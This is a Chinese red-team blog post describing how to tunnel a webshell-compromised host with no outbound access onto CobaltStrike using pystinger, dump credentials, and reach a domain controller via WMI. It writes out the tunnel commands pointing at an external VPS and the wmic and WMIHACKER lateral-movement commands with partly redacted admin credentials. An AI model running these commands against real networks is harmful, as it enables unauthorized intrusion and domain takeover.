[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike？

渗透攻击红队

一个专注于红队攻击的公众号

大家好，这里是 渗透攻击红队 的第 68 篇文章，本公众号会记录一些红队攻击的案例，不定时更新！请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关！

当跳板机器出网的情况下，我们可以随意内网渗透，只需注意免杀问题，那如何拿到一个 Webshell 不出网的情况下，如何进目标内网？如何上线到 C2？

不出网的内网域渗透

前言

首先是拿到了一个 Webshell：

通过初步判断当前机器 icmp 不出网：

那怎么办呢？我们可以基于 HTTP 隧道打！

基于 HTTP 隧道上线到 CobaltStrike

项目地址：https://github.com/FunnyWolf/pystinger

这个东东可以让 Webshell 实现内网 Socks4 代理，让不出网机器上线到 MSF/CS，使用 python 写的一款工具，支持目标站点 php、jsp（x）、aspx 三种脚本语言！

先上传对应的 Pystinger webshell 文件并成功访问：

然后我们还需要将 stinger_server.exe 上传到目标服务器 ，执行如下命令：

start c:\Windows\temp\cookie\stinger_server.exe 0.0.0.0

然后将 stinger_client 上传到 vps ，执行如下命令

./stinger_client -w http://saulgoodman.cn:9009//wls-wsat/proxy.jsp -l 0.0.0.0 -p 60000

此时已将目标服务器的 60020 端口映射到 VPS 的 60020 端口了！

这个时候我们 CobaltStrike 设置监听，http host 填写目标内网的 IP 地址：192.168.0.9，端口填写 60020:

然后我们生成一个 exe，监听器就是刚刚设置的那个：

然后目标运行 exe 马，直接上线到 CobaltStrike：

内网信息搜集

通过 nbtscan 对当前内网进行信息搜集发现当前内网是存在域环境的：

由于当前已经是 administrator 了，且是 Windows 2008 的机器，可以直接抓明文：

抓到了本地管理员和域管明文还有一些域用户的明文！既然域控是 192.168.0.2 这台，那么直接 WMI 横向把：

shell cscript  c:\windows\temp\WMIHACKER.vbs /cmd 192.168.0.2 BExxxx\administrator vmxxxxx whoami 1

直接拿到域控 system 权限！我们还可以用系统自带的 WMI 来执行命令，只不过命令不回显：

wmic /node:192.168.0.2 /user:BEHxxxx\administrator /password:vm$xxxx process call create "cmd.exe /c ipconfig > c:\result.txt"
            
type \\192.168.0.2\c$\result.txt

这篇文章主要就是想表达不出网也是可以对它进行内网渗透的，并不是遇到不出网环境就不能打内网，方法很多，知识面还是会决定你的杀伤链！